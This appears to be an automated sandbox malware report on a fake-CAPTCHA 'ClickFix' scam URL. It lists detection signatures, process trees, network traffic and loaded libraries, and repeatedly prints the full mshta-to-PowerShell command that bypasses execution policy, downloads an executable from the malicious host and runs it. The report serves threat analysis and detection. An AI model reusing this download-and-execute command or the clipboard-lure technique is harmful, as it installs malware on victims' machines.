
Windows Analysis Report
https://anaamw.om/p3.php/1

Overview

General Information

Sample URL: https://anaamw.om/p3.php/1
Analysis ID: 1654830

Detection

CAPTCHA Scam ClickFix
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detect drive by download via clipboard copy & paste
Multi AV Scanner detection for dropped file
Yara detected CAPTCHA Scam ClickFix
AI detected suspicious Javascript
Bypasses PowerShell execution policy
HTML page adds suspicious text to clipboard
HTML page contains obfuscated javascript
Powershell drops PE file
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic

Classification

Classification chart (categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; verdict scale: clean, suspicious, malicious)
  • System is w10x64_ra
  • chrome.exe (PID: 6580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 7108 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1912,i,8822539610411515433,2458465651677738327,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2224 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 2824 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://anaamw.om/p3.php/1" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • mshta.exe (PID: 8100 cmdline: "C:\Windows\system32\mshta.exe" https://anaamw.com/p3.php MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 5972 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Captcha.exe (PID: 7280 cmdline: "C:\ProgramData\Captcha.exe" MD5: CBB05282E7039F0CCFBC1FBB455F14CB)
  • cleanup
Source | Rule | Description | Author | Strings
dropped/chromecache_71 | JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security |
1.3.pages.csv | JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security |
1.1.pages.csv | JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security |

System Summary

Sigma matches on the PowerShell process start (Source: Process started). All seven matches carry the same event data:
  Command / CommandLine / ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
  CommandLine|base64offset|contains: (empty)
  Image / NewProcessName / OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: "C:\Windows\system32\mshta.exe" https://anaamw.com/p3.php
  ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 8100, ParentProcessName: mshta.exe
  ProcessId: 5972, ProcessName: powershell.exe
Authors of the matching rules:
  • Nasreddine Bencherchali (Nextron Systems)
  • Michael Haag
  • Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
  • frack113
  • Florian Roth (Nextron Systems)
  • James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
  • Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5972, TargetFilename: C:\ProgramData\Captcha.exe

Suricata alerts:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-02T16:59:24.188854+0200 | 1810003 | 2 | Potentially Bad Traffic | 66.96.147.114 | 443 | 192.168.2.18 | 50010 | TCP
2025-04-02T16:59:24.188430+0200 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.18 | 50010 | 66.96.147.114 | 443 | TCP


AV Detection

Source: https://anaamw.com/p3.php/1?js; Avira URL Cloud: Label: malware
Source: https://anaamw.com/favicon.ico; Avira URL Cloud: Label: malware
Source: https://anaamw.com/p3.php; Avira URL Cloud: Label: malware
Source: https://anaamw.com/Folder.exe; Avira URL Cloud: Label: malware
Source: C:\ProgramData\Captcha.exe; Avira: detection malicious, Label: TR/Redcap.ivwok
Source: C:\ProgramData\Captcha.exe; ReversingLabs: Detection: 37%

Phishing

Source: Yara match; File source: 1.3.pages.csv, type: HTML
Source: Yara match; File source: 1.1.pages.csv, type: HTML
Source: Yara match; File source: dropped/chromecache_71, type: DROPPED
Source: 1.4..script.csv; Joe Sandbox AI: Detected suspicious JavaScript with source url: https://anaamw.com/p3.php/1... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It appears to be a malicious script designed to execute remote commands and potentially steal user data. The combination of these factors indicates a high risk of harm and should be treated with caution.
Source: https://anaamw.com/p3.php/1; HTTP Parser: (function(_0x4a4c13,_0x1ba179){const _0x10f3e2=_0x2875,_0x478ffb=_0x4a4c13();while(!![]){try{const _
Source: https://anaamw.com/p3.php/1; HTTP Parser: No favicon
Source: chrome.exe; Memory has grown: Private usage: 13MB later: 39MB
Source: Network traffic; Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.18:50010 -> 66.96.147.114:443
Source: Network traffic; Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 66.96.147.114:443 -> 192.168.2.18:50010
Source: global traffic; HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1 | Host: www.google.com | Connection: keep-alive | X-Client-Data: CPyDywE= | Sec-Fetch-Site: none | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
Source: global traffic; HTTP traffic detected: GET /p3.php/1 HTTP/1.1 | Host: anaamw.com | Connection: keep-alive | sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" | sec-ch-ua-mobile: ?0 | sec-ch-ua-platform: "Windows" | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Sec-Fetch-Site: none | Sec-Fetch-Mode: navigate | Sec-Fetch-User: ?1 | Sec-Fetch-Dest: document | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
Source: global traffic; HTTP traffic detected: GET /p3.php/1?js HTTP/1.1 | Host: anaamw.com | Connection: keep-alive | sec-ch-ua-platform: "Windows" | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" | sec-ch-ua-mobile: ?0 | Accept: */* | Sec-Fetch-Site: same-origin | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: script | Referer: https://anaamw.com/p3.php/1 | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
Source: global traffic; HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Host: anaamw.com | Connection: keep-alive | sec-ch-ua-platform: "Windows" | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" | sec-ch-ua-mobile: ?0 | Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 | Sec-Fetch-Site: same-origin | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: image | Referer: https://anaamw.com/p3.php/1 | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
Source: global traffic; HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Host: anaamw.com | Connection: keep-alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept: */* | Sec-Fetch-Site: none | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: empty | Sec-Fetch-Storage-Access: active | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
Source: global traffic; HTTP traffic detected: GET /apc/trans.gif?a38ce52767fa2b26b2add34685ee7810 HTTP/1.1 | Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init | Accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5 | Accept-Language: en-CH | Accept-Encoding: gzip, deflate, br | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 | Host: portal.azure.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /p3.php HTTP/1.1 | Accept: */* | Accept-Language: en-CH | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: anaamw.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /Folder.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: anaamw.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1 | Host: www.google.com | Connection: keep-alive | X-Client-Data: CPyDywE= | Sec-Fetch-Site: none | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
Source: global traffic; HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1 | Host: www.google.com | Connection: keep-alive | Sec-Fetch-Site: none | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
Source: global traffic; HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 | Host: www.google.com | Connection: keep-alive | X-Client-Data: CPyDywE= | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
Source: global traffic; HTTP traffic detected: GET /async/newtab_promos HTTP/1.1 | Host: www.google.com | Connection: keep-alive | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | Sec-Fetch-Storage-Access: active | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
Source: global traffic; HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mshta+https%3A%2F%2Fanaamw.com%2Fp3.php&oit=4&cp=31&pgcl=7&gs_rn=42&psi=gTcE_khvmMX2SDHf&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1 | Host: www.google.com | Connection: keep-alive | X-Client-Data: CPyDywE= | Sec-Fetch-Site: none | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
Source: global traffic; HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.24R2mrw_td8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9vR1rNwOjC3PXOxUlyKiCwNBv2Fg/cb=gapi.loaded_0 HTTP/1.1 | Host: apis.google.com | Connection: keep-alive | sec-ch-ua-platform: "Windows" | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" | sec-ch-ua-mobile: ?0 | Accept: */* | X-Client-Data: CPyDywE= | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: script | Sec-Fetch-Storage-Access: active | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
Source: global traffic; DNS traffic detected: DNS query: anaamw.om
Source: global traffic; DNS traffic detected: DNS query: google.com
Source: global traffic; DNS traffic detected: DNS query: www.google.com
Source: global traffic; DNS traffic detected: DNS query: anaamw.com
Source: global traffic; DNS traffic detected: DNS query: ogads-pa.clients6.google.com
Source: global traffic; DNS traffic detected: DNS query: apis.google.com
Source: global traffic; DNS traffic detected: DNS query: play.google.com
Source: unknown; HTTP traffic detected: POST /$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData HTTP/1.1 | Host: ogads-pa.clients6.google.com | Connection: keep-alive | Content-Length: 67 | X-Goog-Api-Key: AIzaSyCbsbvGCe7C9mCtdaTycZB2eUFuzsYKG_E | sec-ch-ua-platform: "Windows" | X-User-Agent: grpc-web-javascript/0.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" | Content-Type: application/json+protobuf | sec-ch-ua-mobile: ?0 | Accept: */* | Origin: chrome-untrusted://new-tab-page | X-Client-Data: CPyDywE= | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: empty | Sec-Fetch-Storage-Access: active | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
        Source: unknownHTTPS traffic detected: 142.250.80.14:443 -> 192.168.2.18:50020 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.80.42:443 -> 192.168.2.18:50021 version: TLS 1.2

        System Summary

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\ProgramData\Captcha.exe
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Windows\SystemTemp\scoped_dir6580_1940247472
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File deleted: C:\Windows\SystemTemp\scoped_dir6580_1940247472
        Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
        Source: classification engine | Classification label: mal100.phis.evad.win@37/15@33/115
        Source: C:\Windows\System32\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MX73DBBW\p3[1].htm
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3840:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_catfdnkv.dpc.ps1
        Source: C:\Windows\System32\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1912,i,8822539610411515433,2458465651677738327,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2224 /prefetch:3
        Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://anaamw.om/p3.php/1"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1912,i,8822539610411515433,2458465651677738327,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2224 /prefetch:3
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown (22 consecutive identical entries)
        Source: unknown | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://anaamw.com/p3.php
        Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\ProgramData\Captcha.exe "C:\ProgramData\Captcha.exe"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown (3 consecutive identical entries)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\ProgramData\Captcha.exe "C:\ProgramData\Captcha.exe"
        Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: mshtml.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: iertutil.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: powrprof.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: winhttp.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: wkscli.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: umpdc.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: urlmon.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: srvcli.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: msiso.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: srpapi.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: wininet.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: mswsock.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: winnsi.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: ieframe.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: netapi32.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: version.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: msimtf.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: dxgi.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: resourcepolicyclient.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: textinputframework.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: coreuicomponents.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: ntmarta.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: dataexchange.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: d3d11.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: dcomp.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: dnsapi.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: twinapi.appcore.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: schannel.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: mskeyprotect.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: ntasn1.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: dpapi.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: gpapi.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: ncrypt.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: ncryptsslp.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: textshaping.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: jscript9.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: mpr.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: scrrun.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: sxs.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: propsys.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: edputil.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: appresolver.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: slc.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: sppc.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: msls31.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: d2d1.dll
        Source: C:\Windows\System32\mshta.exe | Section loaded: dwrite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
